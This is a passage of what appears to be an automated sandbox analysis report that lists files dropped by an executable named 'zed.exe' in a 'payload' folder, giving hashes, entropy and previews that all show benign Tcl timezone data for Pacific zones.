                                                                                                                                                                                                                                            SSDEEP:96:0KhTG0hjvZkR/bvtw+N6IkWq/WHQlb/RYRWVIKr7cRRL:0sG0U9bFzN6IkWq/WHQt/RY4yP
                                                                                                                                                                                                                                            MD5:45E7E9E183A990F56E17C04FA48CE620
                                                                                                                                                                                                                                            SHA1:A1F39E0ECEA3C64E761A9A3159E331FA51B625F9
                                                                                                                                                                                                                                            SHA-256:D148708F1E70EEFA51E88E5823776CBE710535D4D6D6356E7753A44463A1C5AB
                                                                                                                                                                                                                                            SHA-512:1D1F4BA90D07D7EE12DFD0E37DBFD5410A4EAFFBA8960B816FDD5963CD6B20938080A4248E7B249AAE02F068E817AB9A85735D226F7DA8DD2C5462A70B18E8EF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:PST8PDT) {.. {-9223372036854775808 -28800 0 PST}.. {-1633269600 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-1601820000 -25200 1 PDT}.. {-1583679600 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-84376800 -25200 1 PDT}.. {-68655600 -28800 0 PST}.. {-52927200 -25200 1 PDT}.. {-37206000 -28800 0 PST}.. {-21477600 -25200 1 PDT}.. {-5756400 -28800 0 PST}.. {9972000 -25200 1 PDT}.. {25693200 -28800 0 PST}.. {41421600 -25200 1 PDT}.. {57747600 -28800 0 PST}.. {73476000 -25200 1 PDT}.. {89197200 -28800 0 PST}.. {104925600 -25200 1 PDT}.. {120646800 -28800 0 PST}.. {126698400 -25200 1 PDT}.. {152096400 -28800 0 PST}.. {162381600 -25200 1 PDT}.. {183546000 -28800 0 PST}.. {199274400 -25200 1 PDT}.. {215600400 -28800 0 PST}.. {230724000 -25200 1 PDT}.. {247050000 -28800 0 PST}.. {262778400
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):909
                                                                                                                                                                                                                                            Entropy (8bit):4.042826306713664
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86HbmdH2oVCvcCfdf3NaDyTb6Dye78ubUt1NEUtszIVbUtoUtoUt3mbUt4qUt6:Yekv5fcfem+Cuy
                                                                                                                                                                                                                                            MD5:E5B913965F72AB807BAE67BD20C0A699
                                                                                                                                                                                                                                            SHA1:2161B73EC868C8D18C09970766D19A8583FF7981
                                                                                                                                                                                                                                            SHA-256:983884249ACC11C3FE740D78E72B1A89BE9C8B077283549BF6BCD8C93FA71731
                                                                                                                                                                                                                                            SHA-512:F8807C52DB852C48C62F25569C990C31D977BC7D0DF502CF2B92F9ED6BCB89A6DD8A6758FBD1185E0B5C34DE5450D5C748B71760AC93E72DC3976B3B31D1A605
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Apia) {.. {-9223372036854775808 45184 0 LMT}.. {-2445424384 -41216 0 LMT}.. {-1861878784 -41400 0 -1130}.. {-631110600 -39600 0 -11}.. {1285498800 -36000 1 -11}.. {1301752800 -39600 0 -11}.. {1316872800 -36000 1 -11}.. {1325239200 50400 0 +13}.. {1333202400 46800 0 +13}.. {1348927200 50400 1 +13}.. {1365256800 46800 0 +13}.. {1380376800 50400 1 +13}.. {1396706400 46800 0 +13}.. {1411826400 50400 1 +13}.. {1428156000 46800 0 +13}.. {1443276000 50400 1 +13}.. {1459605600 46800 0 +13}.. {1474725600 50400 1 +13}.. {1491055200 46800 0 +13}.. {1506175200 50400 1 +13}.. {1522504800 46800 0 +13}.. {1538229600 50400 1 +13}.. {1554559200 46800 0 +13}.. {1569679200 50400 1 +13}.. {1586008800 46800 0 +13}.. {1601128800 50400 1 +13}.. {1617458400 46800 0 +13}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8772
                                                                                                                                                                                                                                            Entropy (8bit):3.900078030355782
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:pj4hKuZaqaaiFKgjGeGV3atL67G9kJGsU+mpe7Vy:Cla1KgjGeGcQMsa
                                                                                                                                                                                                                                            MD5:8174D7205622711F58E0B515246FE89D
                                                                                                                                                                                                                                            SHA1:9777B2633ACF5588268D5072F817E65C879358AC
                                                                                                                                                                                                                                            SHA-256:201CFADB00FBCD3283249DAD73872ED75C5BEC07F5A5B157726638C20728B833
                                                                                                                                                                                                                                            SHA-512:64121ED1EE70D5423710319E806B19261576AECC89A64CBEC44A29BF4AC9FEE21C6484CC3C4550CC92C315B3855BE265F696F8CD4D95027226D608B3ADD022F1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Auckland) {.. {-9223372036854775808 41944 0 LMT}.. {-3192435544 41400 0 NZMT}.. {-1330335000 45000 1 NZST}.. {-1320057000 41400 0 NZMT}.. {-1300699800 43200 1 NZST}.. {-1287396000 41400 0 NZMT}.. {-1269250200 43200 1 NZST}.. {-1255946400 41400 0 NZMT}.. {-1237800600 43200 1 NZST}.. {-1224496800 41400 0 NZMT}.. {-1206351000 43200 1 NZST}.. {-1192442400 41400 0 NZMT}.. {-1174901400 43200 1 NZST}.. {-1160992800 41400 0 NZMT}.. {-1143451800 43200 1 NZST}.. {-1125914400 41400 0 NZMT}.. {-1112607000 43200 1 NZST}.. {-1094464800 41400 0 NZMT}.. {-1081157400 43200 1 NZST}.. {-1063015200 41400 0 NZMT}.. {-1049707800 43200 1 NZST}.. {-1031565600 41400 0 NZMT}.. {-1018258200 43200 1 NZST}.. {-1000116000 41400 0 NZMT}.. {-986808600 43200 1 NZST}.. {-968061600 41400 0 NZMT}.. {-955359000 43200 1 NZST}.. {-936612000 41400 0 NZMT}.. {-923304600 4320
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):280
                                                                                                                                                                                                                                            Entropy (8bit):4.715653436088026
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/FtTfDm2OHHhp5oHvZiuo2HvDVeEU8vScH9syZEizy:MB86FtTLmdHf5CvZiIvJeJ8HH9F6izy
                                                                                                                                                                                                                                            MD5:4E858B3754BD8864719A61839ACA64E6
                                                                                                                                                                                                                                            SHA1:597025A8DAFD5AE75EBD162AC0E9DA71815816BA
                                                                                                                                                                                                                                            SHA-256:2D3BFDED297214BA25CFD8C6F508D0C8B1A1CD7D46701A78EC5E510076185EB6
                                                                                                                                                                                                                                            SHA-512:720F301B73C852EA8EEFA79DEF6B6762554E50222DE114FE87EB5178507F1895A9A39B3872A1A4B9DFF58D1CC6460BA4A82F2C165E3659E13036451F22E389C3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Bougainville) {.. {-9223372036854775808 37336 0 LMT}.. {-2840178136 35312 0 PMMT}.. {-2366790512 36000 0 +10}.. {-868010400 32400 0 +09}.. {-768906000 36000 0 +10}.. {1419696000 39600 0 +11}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8165
                                                                                                                                                                                                                                            Entropy (8bit):3.6566720439018874
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:gpvlGCcn6AadFurBrioCdL49mq9X4a2t3I/KVE:gOCBdFurBr0soaz
                                                                                                                                                                                                                                            MD5:8105A806A1762932897AB59C47BBE89E
                                                                                                                                                                                                                                            SHA1:386E41A4A83FA84DBFCA994F679242D067CEED64
                                                                                                                                                                                                                                            SHA-256:CA0EEF84DBC5964EF2265E9252237BE58BB8D75C34817CC2305CCCFAEC7E690C
                                                                                                                                                                                                                                            SHA-512:8A609E7F4868BD455DA811E62142FECD792D0CA0DAAF7C10C4E4254C9EC44B8EB92D388D9224C8FD3CC3FB326A106D831B80F5E1264CCF3EABBCE177BB82E9D6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Chatham) {.. {-9223372036854775808 44028 0 LMT}.. {-3192437628 44100 0 +1215}.. {-757426500 45900 0 +1245}.. {152632800 49500 1 +1245}.. {162309600 45900 0 +1245}.. {183477600 49500 1 +1245}.. {194968800 45900 0 +1245}.. {215532000 49500 1 +1245}.. {226418400 45900 0 +1245}.. {246981600 49500 1 +1245}.. {257868000 45900 0 +1245}.. {278431200 49500 1 +1245}.. {289317600 45900 0 +1245}.. {309880800 49500 1 +1245}.. {320767200 45900 0 +1245}.. {341330400 49500 1 +1245}.. {352216800 45900 0 +1245}.. {372780000 49500 1 +1245}.. {384271200 45900 0 +1245}.. {404834400 49500 1 +1245}.. {415720800 45900 0 +1245}.. {436284000 49500 1 +1245}.. {447170400 45900 0 +1245}.. {467733600 49500 1 +1245}.. {478620000 45900 0 +1245}.. {499183200 49500 1 +1245}.. {510069600 45900 0 +1245}.. {530632800 49500 1 +1245}.. {541519200 45900 0 +1245}.. {56208
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):202
                                                                                                                                                                                                                                            Entropy (8bit):4.943709180393636
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yci/452HAIgObi/4oA6N/ZE/4pv:MByMdNXiU5tVv
                                                                                                                                                                                                                                            MD5:7D9980F68F044EB9B7FA7ED2883645F2
                                                                                                                                                                                                                                            SHA1:9444DA9D3139F51C6DFDA174C8C52A231215D71E
                                                                                                                                                                                                                                            SHA-256:F324CA637180F50DB79FFA25204D974C6A7A6FAEFDA69FD1A280B9F366349A09
                                                                                                                                                                                                                                            SHA-512:850577ABD3A3653076797D46AF481343CDF8103AC597EB68F575C5FF4931242C6ACEB054D14E0F6A9A90E5D22069F78027215A4E44FC900292445FDEAFB8F92D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Port_Moresby)]} {.. LoadTimeZoneFile Pacific/Port_Moresby..}..set TZData(:Pacific/Chuuk) $TZData(:Pacific/Port_Moresby)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8203
                                                                                                                                                                                                                                            Entropy (8bit):3.5469404823178463
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:QXn3AWkHkPp2YXaVU+POtUn4n6MSmSmiTpk9eL6Z5waKkhWILTc:QXn3AWJB2m+POtUnOSmSmS6ZaILg
                                                                                                                                                                                                                                            MD5:002F3607DE2061A2E1A8EB8EBCB6E492
                                                                                                                                                                                                                                            SHA1:6521B47847CFA76FE45AE5CC649109E4AD6C5262
                                                                                                                                                                                                                                            SHA-256:D79A2A67606F25D6420F31129FAE966A54287DE96C661003CCE5F82B618014BC
                                                                                                                                                                                                                                            SHA-512:03F3F262538FAF5A1B38832EFA62E3CC41A70BF54E73DE59BC99DCCA035AB002142F42BEDA5BFC2102CD556601E0A278908FDCC838A2211AC63C49A8483CE72B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Easter) {.. {-9223372036854775808 -26248 0 LMT}.. {-2524495352 -26248 0 EMT}.. {-1178124152 -25200 0 -07}.. {-36619200 -21600 1 -07}.. {-23922000 -25200 0 -07}.. {-3355200 -21600 1 -07}.. {7527600 -25200 0 -07}.. {24465600 -21600 1 -07}.. {37767600 -25200 0 -07}.. {55915200 -21600 1 -07}.. {69217200 -25200 0 -07}.. {87969600 -21600 1 -07}.. {100666800 -25200 0 -07}.. {118209600 -21600 1 -07}.. {132116400 -25200 0 -07}.. {150868800 -21600 1 -07}.. {163566000 -25200 0 -07}.. {182318400 -21600 1 -07}.. {195620400 -25200 0 -07}.. {213768000 -21600 1 -07}.. {227070000 -25200 0 -07}.. {245217600 -21600 1 -07}.. {258519600 -25200 0 -07}.. {277272000 -21600 1 -07}.. {289969200 -25200 0 -07}.. {308721600 -21600 1 -07}.. {321418800 -25200 0 -07}.. {340171200 -21600 1 -07}.. {353473200 -25200 0 -07}.. {371620800 -21600 1 -07}.. {384922800
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):789
                                                                                                                                                                                                                                            Entropy (8bit):4.0457106900970325
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86HmdH6mvCON3Xj/kw2eX/xtDedjX24ots0FX2ud5KRGkpFxy:uegazZBzCdXUFQzy
                                                                                                                                                                                                                                            MD5:6841B8A2FB9BBF464AA00088CBDCEC80
                                                                                                                                                                                                                                            SHA1:26CC5CCE00A765F8B6493ED24F50957AA7F0089B
                                                                                                                                                                                                                                            SHA-256:332372E5EFB46123FBB66F9F32F91B59EBD88ADB956249DB3F14CAAB01CE2655
                                                                                                                                                                                                                                            SHA-512:A6C67A0F7361E599369597E9A8A52FC7D5C96DE6B5A7C1BE1D02F5DF11051F448289786C7F0E82E71CDEB825215E64E072CF034C45D6E2F822D7201AB8B41B57
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Efate) {.. {-9223372036854775808 40396 0 LMT}.. {-1829387596 39600 0 +11}.. {125409600 43200 1 +11}.. {133876800 39600 0 +11}.. {433256400 43200 1 +11}.. {448977600 39600 0 +11}.. {464706000 43200 1 +11}.. {480427200 39600 0 +11}.. {496760400 43200 1 +11}.. {511876800 39600 0 +11}.. {528210000 43200 1 +11}.. {543931200 39600 0 +11}.. {559659600 43200 1 +11}.. {575380800 39600 0 +11}.. {591109200 43200 1 +11}.. {606830400 39600 0 +11}.. {622558800 43200 1 +11}.. {638280000 39600 0 +11}.. {654008400 43200 1 +11}.. {669729600 39600 0 +11}.. {686062800 43200 1 +11}.. {696340800 39600 0 +11}.. {719931600 43200 1 +11}.. {727790400 39600 0 +11}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.82787610497142
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG11avXHAIgObT11ORL/nUDH7/UDH11B:SlSWB9vsM3yckHAIgObON/h
                                                                                                                                                                                                                                            MD5:CD1AC50AADC3CF9C0E7A055D587E790D
                                                                                                                                                                                                                                            SHA1:BEE0E16D3954DF33C697DEA469A130BD9875AB8B
                                                                                                                                                                                                                                            SHA-256:790E6B48B261D6DEF7D183CC8F38FB8D8A6E3EFB8844281EFABB2DFD621E53B5
                                                                                                                                                                                                                                            SHA-512:B6A93DFB4CBE2F35268AACA88FDCC4D19949A2E8DC9464D8341C38065C6FF48A3C49FE756FFCE777C8F806DE309C8AFC4CE4BC4ABD183C28808F995A0F89B091
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Kanton)]} {.. LoadTimeZoneFile Pacific/Kanton..}..set TZData(:Pacific/Enderbury) $TZData(:Pacific/Kanton)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.913439535905759
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDH4ErKYofMXGm2OH18VkeoHvmUENBBy/aCPFVFv7Dy:SlSWB9eg/BE3ofDm2OH1VeoHvmH7y/Fy
                                                                                                                                                                                                                                            MD5:6250F332356787613A2D1853EF6D1AC3
                                                                                                                                                                                                                                            SHA1:0464B9EE8B691990022295D2DEFE1AAE4B247E63
                                                                                                                                                                                                                                            SHA-256:336058DCA4802C79ED43F6177ADB73085D4FA0754B94051CAE2A19346B0C4904
                                                                                                                                                                                                                                            SHA-512:B8FAB5E128D2EF3CB7050DA717D80247045BE09F7F6542AA154CB85F4A56884F195EE2776421890A3F86D133106DCA4672D7D9329E0DE6F4A7CF8F4030822988
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Fakaofo) {.. {-9223372036854775808 -41096 0 LMT}.. {-2177411704 -39600 0 -11}.. {1325242800 46800 0 +13}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):986
                                                                                                                                                                                                                                            Entropy (8bit):3.950865906618592
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CKeaEa+TkUqOL1X7dMUhSXUmxY8yiUKEMH0Mkxu:9pW15Mmk59NQMk0
                                                                                                                                                                                                                                            MD5:E329ACBF859B35950B27F434D725B3F8
                                                                                                                                                                                                                                            SHA1:9B46C4318CA0F03E016F8FF68FEE50EA93B22360
                                                                                                                                                                                                                                            SHA-256:0FF7AF55C92806751473CBF7A55E860850719BA7255CD65FD630B99E05C7C177
                                                                                                                                                                                                                                            SHA-512:84A7491E2C8A6866B40A3673C084ABF3F1E344CB0290C607A0BB06FF19D43EF0B9648CDA6489D10C410D39C700D8C62A8BA11EEF07AD36F5A9AD85C596205939
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Fiji) {.. {-9223372036854775808 42944 0 LMT}.. {-1709985344 43200 0 +12}.. {909842400 46800 1 +12}.. {920124000 43200 0 +12}.. {941896800 46800 1 +12}.. {951573600 43200 0 +12}.. {1259416800 46800 1 +12}.. {1269698400 43200 0 +12}.. {1287842400 46800 1 +12}.. {1299333600 43200 0 +12}.. {1319292000 46800 1 +12}.. {1327154400 43200 0 +12}.. {1350741600 46800 1 +12}.. {1358604000 43200 0 +12}.. {1382796000 46800 1 +12}.. {1390050000 43200 0 +12}.. {1414850400 46800 1 +12}.. {1421503200 43200 0 +12}.. {1446300000 46800 1 +12}.. {1452952800 43200 0 +12}.. {1478354400 46800 1 +12}.. {1484402400 43200 0 +12}.. {1509804000 46800 1 +12}.. {1515852000 43200 0 +12}.. {1541253600 46800 1 +12}.. {1547301600 43200 0 +12}.. {1573308000 46800 1 +12}.. {1578751200 43200 0 +12}.. {1608386400 46800 1 +12}.. {1610805600 43200 0 +12}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):187
                                                                                                                                                                                                                                            Entropy (8bit):4.770127787944403
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGqhyXHAIgObTq0vFvRL/nUDH4QwyFPUDHqNn:SlSWB9vsM3ycmhSHAIgObmSN/BCLNn
                                                                                                                                                                                                                                            MD5:BBB00369FA8DCC23A7824EDB964BF48D
                                                                                                                                                                                                                                            SHA1:A97E42B3CC45860CC0DFC62F468B24A628B43973
                                                                                                                                                                                                                                            SHA-256:AFFB0A5D9CBD5949F2FC5047820FA2A2798F7C303F7BC972EC49CCF27837B00E
                                                                                                                                                                                                                                            SHA-512:2D4C8616308522C987437C39C74E250973C2AC7AA1499C60321F42E84CE52C28D1F6AE81E6390B116C92C7B208EA0F211EB3C5A86E6E4CEE0620014DE5359F4F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Tarawa)]} {.. LoadTimeZoneFile Pacific/Tarawa..}..set TZData(:Pacific/Funafuti) $TZData(:Pacific/Tarawa)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):247
                                                                                                                                                                                                                                            Entropy (8bit):4.687336389955113
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/fEGDm2OHvQYeoHTie7KVQRncRvinrN5/uFifriX:MB86fhmdH0CTV7OcdrN5/uFiGX
                                                                                                                                                                                                                                            MD5:0557D164DCD8DF5D99F7AF5A2AB1AD4F
                                                                                                                                                                                                                                            SHA1:68AFD04303E5F541480425405D82E1827F78A8DF
                                                                                                                                                                                                                                            SHA-256:192545659F971084ADC8489A2B96A6439FF391599DC962AA13375ACCFB3C09D9
                                                                                                                                                                                                                                            SHA-512:1DA004E51F8E7A712EDE920CBB62E81F9F55450FB52B62F78F1CD4F8F4E342B4DAB2C28AA5161E8B24942A7A5BD55F978AFDA1C5E1949241E71D738079DEF9B8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Galapagos) {.. {-9223372036854775808 -21504 0 LMT}.. {-1230746496 -18000 0 -05}.. {504939600 -21600 0 -06}.. {722930400 -18000 1 -06}.. {728888400 -21600 0 -06}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):155
                                                                                                                                                                                                                                            Entropy (8bit):4.976931060677737
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDH5hBYfMXGm2OHKToxYoHsdNfis:SlSWB9eg/DDm2OHPxYoH4qs
                                                                                                                                                                                                                                            MD5:45330CE0FA604304C6ACF8EF8CAF51EC
                                                                                                                                                                                                                                            SHA1:20EEF9646996C2EC9B2641EBCCBE4766BF38B17B
                                                                                                                                                                                                                                            SHA-256:190E02A0C00D165FA45C73AEF9C0D6C82B1720E7406E5610DD860AED10A021A5
                                                                                                                                                                                                                                            SHA-512:51C7931B503405DA0B4078F6BE411895DD00E86AC7C5BE475030664D5302AD614293541DEE7FFC3D86A9DDB1BDA32BCAA746CF1D207DB063FBA2F9E9BE12836C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Gambier) {.. {-9223372036854775808 -32388 0 LMT}.. {-1806678012 -32400 0 -09}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):157
                                                                                                                                                                                                                                            Entropy (8bit):4.9796189407775255
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDH5RyJTLJ5FNMXGm2OHddHvpoxYoHsdMWdHPVtyn:SlSWB9eg/LJHjXDm2OHdFGxYoHgHPLy
                                                                                                                                                                                                                                            MD5:DF09960360D8CEDCA2A4DC19A177C4A6
                                                                                                                                                                                                                                            SHA1:9F73F271B8C85B25FE6392B8BF7465C92EFFE621
                                                                                                                                                                                                                                            SHA-256:161762334DFF48B1D58824911E1FF4171386EA18234DD3DD5B0798515593086A
                                                                                                                                                                                                                                            SHA-512:1BE9E0F90DA529C99E317F399BFDB913A076651CF8801A1849247B26A350A76D8B5807AB139F3DBB97790DDFC332BDBEB57B364BF67FA2BB440AFEDC4130A648
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Guadalcanal) {.. {-9223372036854775808 38388 0 LMT}.. {-1806748788 39600 0 +11}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):733
                                                                                                                                                                                                                                            Entropy (8bit):4.244282318063802
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862mdHanCTCtBCv1yWQkHHLTaWJ+x+87W0x+8+yWSi+JW7+sWU0dwaW1j+FaW2:FeaC2twvY3knLGs+I87p+8d9i+J7s70c
                                                                                                                                                                                                                                            MD5:BA319E451BE323C852A8ABFC299DDA28
                                                                                                                                                                                                                                            SHA1:FC9314C162FF1FE1ED5E2C5DF962A55D4D6D8115
                                                                                                                                                                                                                                            SHA-256:42CB69ABC83415F63CA7D2A3E5314A41817AEE3206ECCC7172C50A74B1597DB0
                                                                                                                                                                                                                                            SHA-512:3BF733B9ED2A57B01BE173A8421B2D5A45888A230461EA0BD8C5B4AC7DC010BB527346731196141C70AFECDF88DD47AFE48636243DFC395D88E58231BEDF7D2A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Guam) {.. {-9223372036854775808 -51660 0 LMT}.. {-3944626740 34740 0 LMT}.. {-2177487540 36000 0 GST}.. {-885549600 32400 0 +09}.. {-802256400 36000 0 GST}.. {-331891200 39600 1 GDT}.. {-281610000 36000 0 GST}.. {-73728000 39600 1 GDT}.. {-29415540 36000 0 GST}.. {-16704000 39600 1 GDT}.. {-10659600 36000 0 GST}.. {9907200 39600 1 GDT}.. {21394800 36000 0 GST}.. {41356800 39600 1 GDT}.. {52844400 36000 0 GST}.. {124819200 39600 1 GDT}.. {130863600 36000 0 GST}.. {201888000 39600 1 GDT}.. {209487660 36000 0 GST}.. {230659200 39600 1 GDT}.. {241542000 36000 0 GST}.. {977493600 36000 0 ChST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):344
                                                                                                                                                                                                                                            Entropy (8bit):4.640604617840767
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/PeDDm2OHsVVoHvBrai3UNFv+rUXaWFvAHovj/0nvCv7p+v:MB86WXmdH0VCvBz0GOTA0/0y74v
                                                                                                                                                                                                                                            MD5:F3F0E64655FAA79E40860765EEBB5B77
                                                                                                                                                                                                                                            SHA1:7F6C2FC100AEABC26B7205AB53C1E016B12E4D60
                                                                                                                                                                                                                                            SHA-256:69319015799D32D3CF7C0A3E9991B4B1F3E0C5D1B4FBF400517350CCA9D2C3B7
                                                                                                                                                                                                                                            SHA-512:7C9238BCCB13B90D4DC9B5E776C421A42C25D21B4E026406F57FA1E70983E8F6BF1CE927AB9D0D6261C5C1802A8B810399F506915262F82F487417CFD704B2F1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Honolulu) {.. {-9223372036854775808 -37886 0 LMT}.. {-2334101314 -37800 0 HST}.. {-1157283000 -34200 1 HDT}.. {-1155436200 -34200 0 HST}.. {-880201800 -34200 1 HWT}.. {-769395600 -34200 1 HPT}.. {-765376200 -37800 0 HST}.. {-712150200 -36000 0 HST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):193
                                                                                                                                                                                                                                            Entropy (8bit):4.844454917943834
